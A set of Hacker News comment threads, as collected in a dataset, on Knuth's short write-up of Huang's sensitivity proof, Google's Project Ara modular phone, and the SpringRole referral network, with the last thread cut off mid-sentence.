> of Don’s own observations about related questions, and had several
> conjectures, with background, to offer._
> _It was a letter, ladies and gentlemen, that was written by a man who very
> much loves his subject and the history of his subject, and who knows more
> about that than any five other human beings that you could name. His
> enthusiasm, his background knowledge, and his mathematical values, that
> impelled him to write such a letter under such conditions, can be taken as
> examples for the rest of us to aspire to._
~~~
ignoramous
You might enjoy this news.yc discussion:
[https://news.ycombinator.com/item?id=18698651](https://news.ycombinator.com/item?id=18698651)
------
userbinator
Congratulations Scott, you are one of the _very_ few people to have _Knuth_
make a comment on your blog. Printing out the comment and framing it on your
wall may be very appropriate. ;-)
(I know he gives out reward checks, but this is the first time I've seen such
a comment. I wonder if anyone knows of any others.)
------
zcbenz
Huang's comment is also very interesting:
> Regarding how long it took me to find this proof, here is the timeline for
> those who are interested.
[https://www.scottaaronson.com/blog/?p=4229#comment-1813116](https://www.scottaaronson.com/blog/?p=4229#comment-1813116)
~~~
jxramos
I find it interesting too in so far as it references Math Overflow...
> Yet at that time, I was hoping for developing something more general using
> the eigenspace decomposition of the adjacency matrix, like in this
> unanswered MO question:
> [https://mathoverflow.net/questions/331825/generalization-
> of-...](https://mathoverflow.net/questions/331825/generalization-of-cauchys-
> eigenvalue-interlacing-theorem)
There's some serious stuff on Math Overflow and the Mathematics stack exchange
([https://math.stackexchange.com/](https://math.stackexchange.com/)). I
haven't figured out what the difference between the two sites is however in
focus
~~~
mauricioc
The line can be blurry sometimes, but it's roughly the difference between
research and teaching. MathOverflow is meant to help mathematics researchers.
At its best, it's like being able to walk over to a colleague's room in a
prestigious math department to ask for insight. Math.SE, on the other hand, is
for "people studying math at any level and professionals in related fields"
and should be used for questions that didn't originate in research, such as
hard textbook exercises. Both are super interesting, and even mathematicians
will have plenty of questions that more suitable for Math.SE than
MathOverflow.
~~~
jxramos
Thank you for clarifying. I've been incredibly impressed with the adoption by
the mathematics community with these tools.
------
espeed
NB: Proof announcement thread from a few weeks ago...
Sensitivity Conjecture Resolved
[https://news.ycombinator.com/item?id=20338281](https://news.ycombinator.com/item?id=20338281)
------
Procrastes
Talk about a coincidence. I just interviewed (for an article) someone today
who happened to mention out of the blue that he's mentioned in the "Art of
Computer Programming". He asked me if I "had heard of Donald Knuth." He didn't
know if people still read those volumes. :) I let him know folks are very much
still interested.
~~~
pradn
In what way is he mentioned? I'm curious.
------
quxbar
:') it's like watching a really great game of baseball
~~~
gHosts
Golf.[https://code-golf.io/](https://code-golf.io/)
Mathematical golfing
~~~
shubrigast
Related: dwitter.net
------
AnimalMuppet
More like two thirds of a page - the bottom third is "notes" which are not
really part of the proof!
~~~
TheRealPomax
When it comes to a proof, there are no notes. Just "Weirdly small typeset text
off to the side that should have been in the main body".
~~~
usmannk
In this case the notes don’t support the proof but rather explore
alternatives.
------
tw1010
This is especially interesting to think about in light of the whole school of
self-teaching Knuth has pushed out into the world in fragmented pieces here
and there.
------
utopcell
Not even a page: 1/3rd of it is notes!
~~~
bytematic
Could fit that proof on a notecard!
~~~
dimtion
Or in a book margin.
------
doe88
One thing is certain reading a mathematical proof from Knuth is TeX and its
beauty will be used ;)
~~~
pdpi
I find it quite amusing that the venue where he announced[0] his more compact
proof mangled word wrapping as badly as it did.
0\. [https://imgur.com/E1Xrzvf](https://imgur.com/E1Xrzvf)
~~~
devnulloverflow
You are amused that the Web has worse typography than TeX???
~~~
lonelappde
How would TeX render that sentence with a long link in a small column?
~~~
krastanov
One of the fallbacks is to switch from justified to right aligned text for
that one line. Most importantly, the compiler issues a warning so that you can
look it up yourself.
------
TrueCarry
I'm sorry, I still don't understand practical applications of that paper. Does
that mean we now can write "smart" function with input of booleans and
sensitivity and get results much faster than if we just iterate over booleans?
~~~
devnulloverflow
While I generally thing that looking for practical applications of research is
nonsense, this one seems to be in an obviously useful area.
It's all about different ways of measuring how good a function is at
scrambling the input data. I'm guessing if you want to break (or make) a hash
or cryptosystem you will use these measures over various aspects of it to look
for weaknesses or some such.
This _particular_ proof seems to be saying that the measure called
_sensitivity_ will give you similar answer to a bunch of other measures.
On the one hand, that's disappointing (a measure that gave totally different
results might enlighten whole new ways of attacking/strengthening you crypto).
On the other hand it is encouraging because if a whole bunch of very different
measures agree, then that's a sign that they are on to something real.
------
oneepic
_The Don._ Quite a fast turnaround too.
~~~
copperx
Isn't Knuth about 80 years old? If that isn't humbling, I don't know what is.
~~~
antupis
I would donate my kidney if I would be half of bright as Knuth in 81 years
old.
~~~
pjmorris
I would donate my kidney if it'd help Knuth live long enough to finish his
series!
~~~
aryamaan
Not to innuade the value from his books; but I do have a question.
Are his books useful for someone who are into improving his daily-job-
programming skills? I gave a look at the indexes of his books, they seems more
relevant for when I was into algorithmic programming competitions.
~~~
commandlinefan
I read all of the first three volumes and attempted every exercise. It took me
a little over three years, and most of the focus was on very low-level stuff
like random number generation, arbitrary precision math, sorting (of course)
and memory management. The first book is half math and then a lot of the rest
discusses his assembler language MIX. The middle third or so of volume 3
discusses how to optimally sort files that are stored on tape (!) that are too
large to fit into main memory. So, no... rather than to say the books aren't
_useful_ for a practicing programmer, I'd say that there are far, far more
productive uses of your time. However, I really enjoyed reading them, and I'm
glad I did, and I recommend them to everybody. I think they've made me a
better programmer in the sense that I can appreciate what goes into the
routines that I'm using, but I doubt I'll ever have cause to prove the runtime
bounds of an algorithm like Knuth does.
I have peeked at the two new volumes (4a & 4b) and it looks like they spend a
lot of time on graph algorithms, which _are_ contemporary and something you
might apply directly. All of the examples are in MMIX (a more modern, but
still imaginary, assembler dialect), so if you wanted to jump right into 4A,
you'll have to learn MMIX first. You can download the MMIX description off of
Knuth's website ([https://www-cs-
faculty.stanford.edu/~knuth/mmix.html](https://www-cs-
faculty.stanford.edu/~knuth/mmix.html)) if you want to dip your toes into
Knuth before committing to one of the books.
~~~
copperx
What is your Math background, if I may ask? I want to know how mathematically
mature one has to be to attempt the exercises.
~~~
commandlinefan
I had an MSCS when I started, but if you did a STEM undergrad, you should be
fine - he actually explains everything you need. Don’t get me wrong: the
problems are brain-bendingly difficult, but you don’t need to know how to do
them before you start.
------
hoten
what a legend. he's golfing.
------
estomagordo
This is amazing.
------
dang
We changed the URL from
[https://www.cs.stanford.edu/~knuth/papers/huang.pdf](https://www.cs.stanford.edu/~knuth/papers/huang.pdf)
to where Knuth actually said that.
------
emmelaich
Not a link to a pdf, despite the HN title.
It's a link to Knuth's comment which has a link to the pdf.
[edit; saw dang's comment just now which says the HN link has changed.]
~~~
m463
[https://www.cs.stanford.edu/~knuth/papers/huang.pdf](https://www.cs.stanford.edu/~knuth/papers/huang.pdf)
~~~
emmelaich
Yep, I posted that comment because some (including me) tend not to click on
pdf links.
------
sunstone
Ok so now you're just showing off. :)
------
m463
Any proof can fit on one page.
(for the set k where k is the inventor of tex)
~~~
LegitShady
prove it on one page.
------
sjg007
Does this have any implications for P vs NP? I guess the question would be is
the sensitivity of a 3-SAT problem related to finding a solution?
| {
"pile_set_name": "HackerNews"
} |
Project Ara – Google's modular phone project - JS1984
http://www.wired.com/2014/04/google-project-ara/
======
netcan
A musing about the aesthetic of modular:
My first 21st century "gadget" (for some obviously arbitrary definition of the
term) was an ipod nano. I'm not very sensitive to the niceness of things in
general so I was pretty surprised at how much I liked how it looked and felt
in my hands.
It was, cold metallic, small, sleek and completely solid. It had no give in it
at all and felt like a magic rock. The solidness of it made it feel
futuristic. I find that I like my SSD laptop a lot more than the old HDD one
for similar reasons. I think it has to do with it not revealing anything about
how it works.
I imagine artifacts of the future continuing along these lines. Impenetrable
to analysis by the naked A solid mass of synthetic minerals arranged in a very
precise way so that electrons are precisely directed this way or that way. But
to the naked eye, there is no cause and effect beyond the minimal input and
output.
On the opposite side, I can get a lot of enjoyment from messing around with
something like a foot-treadle loom or 18th century brass navigation
instruments. Even just looking at them is fun. They are complicated enough to
be very clever and interesting. Too clever to invent yourself. But, they are
still simple enough to understand using your eyes. You can get an "aha!" from
seeing the flying shuttle work on a loom. The objects themselves being so
common in mythology also adds to the flavor. You can see the incredible
potential of adding more gears and levers.
It's an accessible cleverness that you can experience pretty directly. I find
it fascinating that space cowboy fiction & steampunk exist. First, future
tense nostalgia is an interesting concept. Second, I think it shows a kind of
longing for objects that are both futuristic but understandable.
The loom is obviously a human artifact. The ipod is something we
intellectually understand to be an artifact, but emotionally it doesn't feel
like human one. A magic object doesn't hint at its workings.
Beyond the practical advantages of a modular device, I think there is a
steampunk-esque appeal to the idea. We could weld together a brass spaceship
using an energy crystal to power the electron sail (both naturally obtained by
barter or pilage ).
~~~
anigbrowl
You are the sort of person who would enjoy using modular synthesizers.
* Not responsible for possible bankruptcy/ divorce/ loss of employment resulting from acting on above advice
~~~
wcfields
Forum to pump that paycheck into:
[http://www.muffwiggler.com/forum/](http://www.muffwiggler.com/forum/)
~~~
MrJagil
A thousand times yes. Muffwiggler is the place to be.
------
abruzzi
Once upon a time, when I was younger, I felt very strongly that I needed a
computer with everything replaceable. I wanted to replace a CPU when it got
too slow, new graphics card, upgradable RAM, storage, etc. But I found that in
the end while I'd make small upgrades, I still replaced my computers at close
to the same rate. That because some standard that was built into the old
machine was no longer fast enough or wide enough for newer uses, or an
interconnect standard changed (think ISA, to PCI, to PCI-X, to PCI-e) The
other reason is while i could upgrade some parts, I couldn't upgrade all the
parts, and pretty soon those parts were now two or three years old. They were
no longer as reliable as a brand new system.
I wonder with these modular phone ideas, if we're looking at the beige box PC
industry all over? And whether it will be a good fit to mobile or whether
you'll buy your modular system in a year, and then find in another two years
that there is a new modular interconnect version without backwards
compatibility, and gradually you won't be able to find modules that work with
your current frame, so you have to replace that, and maybe the some of your
old modules don't work with the new frame, so you have to replace them at the
same time. Like a lot of beige bok PC geek, you'll end up with a drawer of old
modules in a drawer that you hardly ever find a need for, but you cant bring
yourself to throw them away unless they're actually broke. The smart person
will just buy all new modules when they replace the frame (that what most
people did when they replaced their beige box, because why upgrade but still
carry over that old junky graphics card). Pretty soon your at a point where
the primary benefit of modularity in not upgrading pieces, but the ability to
spec exactly the phone you want when buying. But in reality there are a lot of
phones on the market now, and you can come pretty close.
I don't know that this will be the case, but its how I'd bet it would end up
playing out.
~~~
mturmon
Google might benefit strategically from a market where phones are commoditized
down at the hardware subsystem level. This would further disempower hardware
integrators like Samsung.
The analogy is Microsoft:beige box::Google:component phone.
~~~
userbinator
> where phones are commoditized down at the hardware subsystem level
This is already happening with the various Chinese manufacturers and the
Mediatek MT65xx platform. There are literally hundreds if not thousands of
different models, all slightly different looking and with different
dimensions, but based on the same internal reference design with minor
changes, often to the point of ROM interchangeability.
------
evanmoran
This is absolutely the right direction, but not in the way you think. This
shouldn't be branded as a phone -- size and look matter too much. It should be
branded the tool of the future, designed for people people in the field:
electricians / construction workers / scientists / tinkerers. Let me plug in
an altimeter, leveler, or multimeter. That is what is missing on my iPhone,
and this is the first thing I've seen modular enough to pull it off.
And, yes, I've been thinking Tricorder this whole time=).
~~~
rch
I'm curious to see what I will be able to do with the interconnect myself. For
instance, could I rig something up to hook a couple of modules to my laptop or
car?
~~~
yarri
This question was asked at the tech conference yesterday, and they may clarify
it in the MDK [0] but the project team seemed to downplay this aspect,
preferring to pitch the idea of a "low cost mobile phone for the next billion
users."
Still, the modules can be emitters (ie., BT/ZigBe modules) although they were
unclear about how module developers would get these certified. And I guess no
one is stopping you from adding cables to a module, but the UniPro based and
M-PHY current specs wouldn't get you very far... 10cm cable perhaps?
[0] [http://www.projectara.com/mdk/](http://www.projectara.com/mdk/)
------
sdfx
I think John Gruber over at Daring Fireball said it best:
_" I remain highly skeptical that a modular design can compete in a product
category where size, weight, and battery life are at such a premium. Even if
they can bring something to market, why would any normal person be interested
in a phone like this?"_
[http://daringfireball.net/linked/2014/04/15/project-
ara](http://daringfireball.net/linked/2014/04/15/project-ara)
~~~
josefresco
Size matters? My Android friends have huge phones (and cases) - Clearly they
don't mind a phone being big and if the phone had cheap replaceable parts,
that giant "life proof" case wouldn't be needed.
Weight matters? I have never heard "I wish my phone was lighter" from anyone,
anywhere. In fact I've heard from several who think a heavier phone means it's
"better made".
Battery life - Again my Android friends (and a few 5c friends) suffer from
poor battery life - How would a phone where you could easily swap for a
new/better battery be inferior?
Gruber should remind himself of the first generation of pretty much any tech
product. Bulky, ugly, and clumsy could describe a lot of projects that push
technology to it's limits.
~~~
jan_g
It does matter when comparing with alternatives. Modular phone with comparable
specs to other phones (screen size, cpu, camera, etc) would probably be
bigger, thicker, heavier and uglier. In other words, even when a customer is
buying a big 5"\+ phone, then I think he/she will probably not choose the
modular one.
~~~
josefresco
I think the key is the purchasing model. A "free phone" with contract every 2
years creates a situation where the consumer doesn't value repairing/upgrading
their phone.
If you had to pay say $600-$800 for a phone upfront, one is
upgradable/repairable and the other is not (but faster/sexier) I think some
(maybe many) would choose the former.
~~~
adestefan
I know people that just toss an $800 laptop like it's nothing when something
goes wrong. We truly live in a disposable society.
~~~
k-mcgrady
>> "I know people that just toss an $800 laptop like it's nothing when
something goes wrong. We truly live in a disposable society."
Nope. You just happen to know people who can afford to toss an $800 laptop.
For most of the 'lower middle class' people I know purchasing a laptop is a
big deal and only happens once every 3/4/5 years. Even then they don't spend
more than £400. Even when their laptop is practically unusable through age,
damaged parts, viruses etc. they continue to use it because £400/$800/a new
laptop is a lot of money.
~~~
sp332
But the only difference is the amount of money, not the attitude. No one
thinks "I can afford a new laptop, but I'll rehabilitate this old one anyway."
~~~
dublinben
I must not be anyone then. I have a (nearly) six-year old Thinkpad that I've
upgraded a few times. I could have afforded a new replacement at any time, but
I'd rather keep using the machine I already have.
------
bane
I'd actually love it if this idea extended far enough to let me double my
"phone" as an impromptu laptop/desktop. I know that we can use a bluetooth
keyboard or whatever and kind of simulate things. But I'd love to carry around
a single computing device that I can drop into a cradle at home and it's using
my two big desktop monitors and nice keyboard/mouse, and when out and about,
head into a coffee shop and swap the screen out for a larger screen and
keyboard, and then head onto the subway and just swap the screen back and use
it like a phone. Then end of the day, head to the gym and swap out a few parts
and have it just play music for me while I work out. Head out for a hike on
the weekend and configure it like the Gym, but put in a better GPS unit and a
bigger battery or something. Go to the store and swap out the GPS unit for a
barcode scanner so I can comparison shop a bit. If something breaks, I can fix
it myself. Go home and plug it into an HDMI port and watch movies or play
games or something. Want to read a book? Swap out the screen for an e-ink
screen. Going on a trip? swap in the GPS device, big battery and the Nokia
camera module so I can use my nice lenses and find my way to the sites. Swap
the screen for the bigger screen later so I can review and edit my photos for
the day.
I could trade my notebook, camera, desktop, console, media devices, mp3
player, e-book reader and tablet in entirely.
But all my data is present for me and I can work on it, context appropriate to
the interfaces I have available at that moment.
I wouldn't mind having a few bits and parts floating around my backpack if it
gave me the flexibility to do that kind of thing.
~~~
smorrow
I like the modularity idea, I don't know if I'd want to be swapping components
five times a day though.
If the idea is just to have the same files/data on all your "different"
devices, I think I like the idea of running a central fileserver with that
stuff on it, and having separate phone, desktop, etc, that each do two or
three things and do them well, and they all mount the fileserver, which has a
much storage as you want, gets backed up regularly, is where indexing happens,
is where long-running downloads happen. and everything mounting that gets the
same files. oh, and a server is less likely to go missing or stolen or soaked.
Your idea is the simplest way to preserve application state between
"different" devices, my idea is the best way to preserve saved-file state (and
only that) between using different devices.
Your idea has been done to some extent by the Motorola Lapdock, but I don't
actually know anything about it.
~~~
jkimmel
You're indeed correct that Moto attempted something similar with the Atrix.
As a onetime Moto Webdock owner though, I'll attest to the fact that the
grandparents dream is far from realized. At the time, the phone was simply too
underpowered to provide a usable experience running _just a browser_ (outdated
Firefox at that). I picked the accessory up on Craigslist and it quickly found
a resting place in my closet -- it was neat, but only in the proof of concept
sense.
I'd love to see a company attempt something similar with today's hardware. A
phone like the Nexus 5 / HTC One could provide a pretty slick experience,
given enough RAM.
------
jacquesm
The first time I saw a modular phone was long ago (2000) in the lab of a very
large hardware company where they had a prototype from a start-up they'd
invested in.
It was made like a deck of cards, cpu, display/kbd, battery and cell
components could all be swapped out. There even was a camera module for the
back. It didn't make it. The main reasons iirc were that people see phones as
integrated wholes, that contacts breed failure and that making an integrated
phone versus one made out of pieces is simply cheaper.
Curious how this one will fare!
[http://en.wikipedia.org/wiki/Phonebloks](http://en.wikipedia.org/wiki/Phonebloks)
~~~
bane
> that contacts breed failure
Just like in software, the interfaces are where the complexity lies.
------
enscr
People are viewing this project as a 'lego' phone that sounds great in theory
but doesn't charm practically. However manufacturers can take a middle ground
approach where future electronics slowly move towards hot swappable
components. Upgrading & replacing defective parts shouldn't require a screw
driver and perhaps as easy as plugging in a USB cable.
When I'm buying a high end phone & spending $600, I'd want it to last 5-6+
years. However the current ones typically stay relevant for barely 2 years and
the residual value is below $200. How about a phone that I'm not scared to
drop because if something breaks, I can easily swap out a new LCD, ofcourse at
a reasonable cost. Many users like me would be willing to sacrifice the form
factor slightly to get the ability to make my device last longer.
However all this goes against how manufacturers make money i.e. make you buy
new product frequently & charge an arm & a leg for repairs.
~~~
anigbrowl
There are other models, like sell the razor cheap and charge more for the
blades, which can support a product ecosystem, albeit a smaller one than that
for grooming products.
Consider that the FOB price for replacement cellphone cameras is under $5 in
quantities of $100. The hardware is cheap, the labor of installing it into a
phone that needs repair is not. But if you make it user-installable (as here),
you can sell the exact same camera for maybe $20-30, with only a minimal
increase in the cost of production for the modular package. So this could work
out quite nicely for component manufacturers by giving them a small additional
revenue stream from enthusiast/hobby buyers.
All those people complaining that it won't be competitive with other phones
for consumer dollars are _totally_ missing the point. Of course consumers will
continue to prefer all-in-one products from brand name manufacturers like
Apple and Samsung, for the same reason that most consumers want a car that
Just Works rather one that requires them to be an amateur mechanic.
And yet, there's a thriving retail business in auto parts, because a lot of
people _do_ like to hack on their cars or carry out their own repairs. And
likewise, there's a market for modular phones among hackers, engineers, high
school and college students, and all sorts of other niches, who want
flexibility but don't necessarily want to go down the Arduino route with
soldering and building their own cases and PCBs. Simple example: stick two
camera modules into one of these things, and you have a super cheap 3d camera
platform.
This will be absolutely huge in the developing world where utility >>
convenience or aesthetics.
------
Zak
I find this interesting in contrast to Nexus devices. Two or three years ago,
most Android phones had SD cards and removable batteries. These features have
been conspicuously absent from recent Nexus phones in spite of their appeal to
the power-user and developer markets who are among the most likely to want
such features.
I hope it gets some traction. I'm seeing a lot of sameness in high-spec
Android phones, and something like this might help manufacturers learn what
kinds of variations might sell without having to take the risk of mass-
producing and marketing a new model.
P.S. - if any manufacturers are reading this, I want a high-spec Android phone
the size of an iPhone. My Nexus 5 is somewhat uncomfortable in my pocket and
too hard to use one-handed due to its size.
~~~
psbp
Moto X.
~~~
Zak
I'm not sure what part of my comment you're responding to, but I don't think
the Moto X is a good response to anything I said. It doesn't have removable
storage. It doesn't have a removable battery. With a 4.7" screen, it's much
bigger than an iPhone.
~~~
mikeevans
Have you seen how big it is next to an iPhone? Pretty close in physical size,
despite the screen.
[http://i-cdn.phonearena.com/images/reviews/142861-image/Appl...](http://i-cdn.phonearena.com/images/reviews/142861-image/Apple-
iPhone-5s-vs-Motorola-Moto-X-001.jpg)
~~~
Zak
My mother owns a Moto X, bought on my recommendation. It is much closer in
width to my Nexus 5 than it is to the iPhone and barely more comfortable for
me to use one-handed than my Nexus 5. The difference in width is apparent in
the photograph you linked.
I commend Motorola for an excellent job eliminating non-screen area on the
front of the Moto X. It's a very space-efficient device in that regard, but my
complaint is about reaching all areas of a touchscreen with my thumb while
holding it in one hand, and nothing fixes that like a smaller touchscreen.
------
LarryMade2
Yeah, right.
I remember computers built in the 90s and 2000s, touting their modular
construction and never having to buy a new system again. I wonder if those
machines are still in operation?
I think what would guarantee longevity is something that is rock-solid good,
inexpensive, repairable, and easy to develop on. I'm thinking of track records
of computers like the Commodore 64, iMac, or in vehicles like the beetle,
video game consoles, ipod, iphone etc.
~~~
bane
You mean, pretty much any computer not made by Apple? Sure, I still have my
home-rolled desktop from 7 years ago. I just put together a new machine
earlier this year I expect to get at _least_ that much life out of. I don't
even buy top-spec parts, just good price/performance ratios for each part and
cobble it together. And if something breaks I can fix it myself.
It's not too technical and not too hard to do. About as complicated as making
a full dinner with main course, two side dishes and a dessert.
On the flip side, every other machine I've had that was closed, mostly
laptops, but I'm thinking of my C64, and my Coco2, when the smallest piece
died on those things, right into the trash they went. There's literally
nothing you can do to fix them that doesn't involve an engineering degree and
a lab.
------
AndrewDucker
If one of the modules can be a keyboard, then I know a fair few people who
will buy one...
~~~
Slackwise
The keyboard is _the_ module I want.
I used my T-Mobile G2 until it died a month ago, and had to do an emergency
replacement, which ended up being a Nexus 5. I'm going absolutely insane not
being able to just type without thinking about it. When you have to think
about your input and often correct it, you are no longer able to simply stream
your thoughts, and each micro-interruption is actually quite a distraction
from getting things done. It's frustrating.
------
CHY872
Yeah this is probably just one of Google's projects where they try and make a
device that totally uses the concept, realise that most of it's pretty bad and
redo it with a device that uses it for the single part that worked. The cynic
in me says 'replaceable battery' but I'd like to see replaceable SOC.
~~~
josefresco
Screen and battery are the two most common complaints/issues with current
phones. Simply allowing consumers to buy and swap these two parts would go a
long way.
------
ctdonath
As technology continues to shrink more functionality into less space, it
crosses the threshold where human limits require the device be _at least this
big_ (whatever that size/shape minimum is). A screen can only be so small
before it's practically unreadable. A touch area must provide at least so much
space between tap targets and accommodate "fat fingers". The box of a phone
must be big enough to hold comfortably to an ear. A small matchbox-size device
would just plain be too awkward to use.
Seems Apple initiated the unchangeable phone (no swappable battery, extremely
tight/solid tolerances) in part to get all that core functionality inside a
box that small. Sufficient battery required X _Y_ Z volume; making it
removable wasted a nontrivial amount of that, affecting talk time &
durability.
Now that core functionality can be _smaller_ than the minimum usable size,
including battery life acceptable to most users, there's some space again to
"waste" on components like pluggable interconnects, module packaging (so a
part is not fully exposed when removed), air gaps, etc.
"This here's a good axe. It's had nine handles and three heads."
"This is the last phone I bought. It's had nine batteries, three CPUs, two
displays, four radios, ..."
------
higherpurpose
If you read Clayton Christensen's Innovator's Solution [1] book (sequel to
Innovator's Dilemma), you'll see him talk about "integration" and
"disintegration" (basically the modularization of a product or market).
So in the early days of a new market/category of product, the products are
highly integrated, for several reasons. One is that the market is still new,
so there isn't much of an "ecosystem" to begin with. Another is that the
company with the "first mover's advantage" wants to keep stuff proprietary as
much as possible, and another is that the product still kind of "sucks" in
some areas (camera, battery life, in early days of the iPhone for example -
compared to the traditional competition). So they need to make everything work
as tightly as possible, to squeeze all the possible optimization out of it.
But eventually, the market becomes mature, the ecosystem grows, and the
products become "good enough" for most people. So much of that extreme
optimization or need to keep everything proprietary and in-house isn't needed
anymore, and you actually start getting some advantages from the
modularization of the market, such as buying a better modem than you can make
from a "modem company", and so on.
For a while I wasn't sure this was going to happen to the smartphone market
(ignoring the fact that there has been an increasing trend towards
customization through colors and whanot), because for one the smartphone is a
very tighly put together product, and it's hard to imagine how it could've
been separated into a dozen different pieces without being junk, and two, for
a while the trend was towards increasing "closeness" of devices, rather than
openness.
But it seems it's going to happen, and ARA looks just about right (I wasn't a
big fan of the Phonebloks pin-model). Still, even if the strategy here is
"correct", and most likely on the _right side of history_ , Google will still
need to excel at execution, and make sure using such a phone gives very few
disadvantages compared to a regular phone, but many more advantages (being
able to use whatever camera you want, without buying a $700 phone every year,
and so on). Otherwise, people could be turned off by the initial version, and
then it will be a lot harder to convince them what a good idea this is. But
for now I'm optimistic.
[1] - [http://www.amazon.com/Innovators-Solution-Creating-
Sustainin...](http://www.amazon.com/Innovators-Solution-Creating-Sustaining-
Successful-
ebook/dp/B00E257S7C/ref=sr_1_1_bnp_1_kin?ie=UTF8&qid=1397650807&sr=8-1&keywords=innovator%27s+solution)
~~~
andosa
> So in the early days of a new market/category of product, the products are
> highly integrated
Not sure about this one, seems like the opposite to me. Twenty years ago, PC's
were very modular, and it was very common to add/upgrade a sound card, memory,
cpu, video card etc. Fast forward to now, and for the most common computing
devices (think tablets and smartphones), there is almost zero modularity or
upgradability. Even with current PC's (i.e. mostly laptops), it's increasingly
limited.
The same trend is apparent in other similar technology. For example with
analog TV, people could add a PAL block if their TV was NTSC or SECAM.
Upgrading your car used to be significantly easier etc.
~~~
divy
You're forgetting the first wave of PC's - Apple II, TRS-80, TI-99, C64, etc.
These machines had very little modularity compared to the wave of beige boxes
that followed the IBM PC standard. I think Christensen even uses that as an
example.
~~~
uxp100
The S-100 buss based machines before those were very modular, if perhaps not
PCs in the same sense.
------
Zigurd
I give this about a 5% chance of success, and 1% market share, maybe less, if
it does succeed. That's still more than 10 million units per year, so not a
failure. But this isn't going to be _your_ next phone.
If it falls much below that unit volume, the scheme implodes because the
optional components will not find enough of a market to get manufactured.
In order to succeed, the internal connectivity scheme needs to not go obsolete
over at least two, and preferably three product generations.
It also needs to find a market. People still build their own PCs for gaming,
for lab automation, and other distinctly minority pursuits. So far, the niche
for this product seems to be "people who find the idea attractive but can't
articulate an actual need."
~~~
blah314
If all my module slots can go to batteries, I'll be tempted.
~~~
higherpurpose
I think they said at least 2 modules can be used as battery (the larger ones).
------
drakaal
Raise your hand if you bought an "upgradable" mother board in the 286 and 386
days.... Do you still have it?
I have a computer that still uses some of the same screws that my 486 used.
For a long time I kept the original hard disk spinning even though I didn't
store stuff on it... But when IDE connectors went away I stopped bothering
with keeping it for nostalgia.
Even my case is no longer compatible, the power supply stopped being
compatible long ago.
Some of this is "advancements" some of it is just that manufactures want to
sell you new stuff.
Houses are about the only thing that are modular and you can say you will only
need to buy one... The house I grew up in is nearly 200 years old. So far it
hasn't needed to be replaced to do incompatibility.
------
bausson
There is a market, or should I say: there are markets: * people who often
broke their screens (my current boss is at 3 screens in 2 years, and counting)
* enthusiast, early adopters, developpers,... * There is probably a good way
to market it in developing countries too.
I would love having that phone, even more with a firefoxOS running on it.
Having that plateform with open hardware specifications would be a huge boon
for it to become a viable ecosystem. I could see firefoxOS and windows phone
boarding it quite easily if it take.
PS: whereas specifications are open or not, IDK at the moment, not a lot of
reliable information being available. Wishful thinking on my part I suppose.
Still hoping.
------
joshuapants
As someone mourning the fall of the full-qwerty physical keyboard phone (yes
there are the new BB phones, but by the next time I upgrade I anticipate that
BB will be dead), this gives me hope. There may not be enough people who want
them for manufacturers to make whole phones, but maybe there are enough to
support a market in quality keyboard modules.
------
eric_cc
This is not marketed at me.
My phone buying thought process: Does this phone have the software I care
about? Are apps tested to work with my exact device? Sold.
I do not want to spend a split second thinking about modules or RAM or
anything and I'm a very technical person. I cannot imagine my mom dealing with
this crap.
What is the market here? I would pay a premium to NOT deal with modules.
~~~
stackcollision
Once this is out, you _are_ paying a premium to not deal with modules by not
getting one. It's a $50 phone you can swap components in and out of as
upgrades become available. To me, that's infinitely better than buying a new
$300 smartphone every other year.
But there's also a second appeal. Right now, phones are impenetrable black-
boxes. You get what the manufacturer thinks you want. The reason I think a
modular phone will become very popular is the same reason the AR-15 is the
most popular gun in America: because you can play with it. You can swap parts
in and out depending on what you need.
"Oh, I'm going hiking today? Better stick my extra-big battery and wide-field
camera into my phone."
"Apple's putting a new zillion-byte SSD in the iPhone 9Q? Well good thing I
can just buy the zillion-byte module for my modular phone instead of having to
buy a whole new one."
And a million other examples.
------
fiatjaf
Where are all those comments, blog posts and experts' analyses saying
Phonebloks could never work in this world?
------
encoderer
I think the real-world use cases for a modular consumer device--like the
Sasquatch of meaningful OOP code reuse--is overstated.
I think this could work for business use. But the consumer equation is tricky.
Phones are fashion. Also phones take a lot of abuse.
------
id
I really don't think phones will stay the way they are for decades. And
modular phones definetely won't bear up for decades.
At some point every piece of the phone will have been exchanged, making it a
completely new phone.
~~~
Tyrannosaurs
Is that a new phone though?
_invents the question of the philosopher 's modular mobile phone_
~~~
id
The ship of Theseus is a thought experiment that raises the exact same
question.
[https://en.wikipedia.org/wiki/Ship_of_Theseus](https://en.wikipedia.org/wiki/Ship_of_Theseus)
[https://en.wikipedia.org/wiki/Identity_and_change](https://en.wikipedia.org/wiki/Identity_and_change)
~~~
Tyrannosaurs
I love that that Wikipedia article references Sugababes - a British pop band
which has changed entire line up over it's existence (begging the question is
it still the same band).
------
koalaman
I wish someone had done this for PCs 20 years ago.
~~~
stackcollision
Can you clarify what you mean? Maybe not 20, but 15 years ago my dad was
mucking around in the guts of our family computer, performing his own
upgrades. By the time we got rid of that thing the only original component was
the case. And nowadays you can order any piece of hardware you want off the
internet and slap it in.
------
gcb0
heh. you guy really have any hope? just count the number of devices google and
its nexus partners released without even a sd card slot! motorola too since
the google devices started.
the market demands that fast obsolency and they are evil now. the only thing
holding back the nexus one as a strong daily phone is that it have no space
for more than 5 modern apps. it does if you hack android 2.3 to install apps
on the SD...
anyway. i wouldnt hold my breath. this is being done just to fail and harm
other people pursuing it honestly. cynic much? probably. but i am mostly
stating facts. how much does a sd slot saved in costs from your $600 phone?
nothing. hiw many years its lack cut from the device longevity? more than
half.
edit: plus the feature they advertise more is electro magnets! on a device
where the biggest concern is battery... and which will have a case anyway that
could hold everything together in case they used simple mechanical latches.
------
kevingadd
It's a little gross that they seemingly picked up the PhoneBloks project and
then entirely erased any traces of the original product and its creators.
Hopefully that team's still involved and getting compensated...
~~~
itp
From reading
[http://en.wikipedia.org/wiki/Project_Ara#Development](http://en.wikipedia.org/wiki/Project_Ara#Development)
I'm not sure it's fair or accurate to say they "seemingly picked up the
PhoneBloks project."
| {
"pile_set_name": "HackerNews"
} |
SpringRole – Everyone is a Recruiter - misbah143
https://medium.com/@kar2905/springrole-everyone-is-a-recruiter-a4ba7d1e0578
======
vitd
When they say they've "written 2,000 checks worth $45,000," they're basically
saying they'll pay you, on average, ~$11 per referral? Most employers I've
worked for pay at least $250 per referral for regular work, and much more if
they have an urgent or very specialized need. I'm not sure I see the advantage
of joining this network over just referring people to my current employer.
------
siganakis
Am I right in guessing that a "Passive user" is a user whom you collect
information on without them opting in? E.g. By scraping public profiles or
collecting connections from registered users?
Is it possible to view / check / correct any information about myself if I am
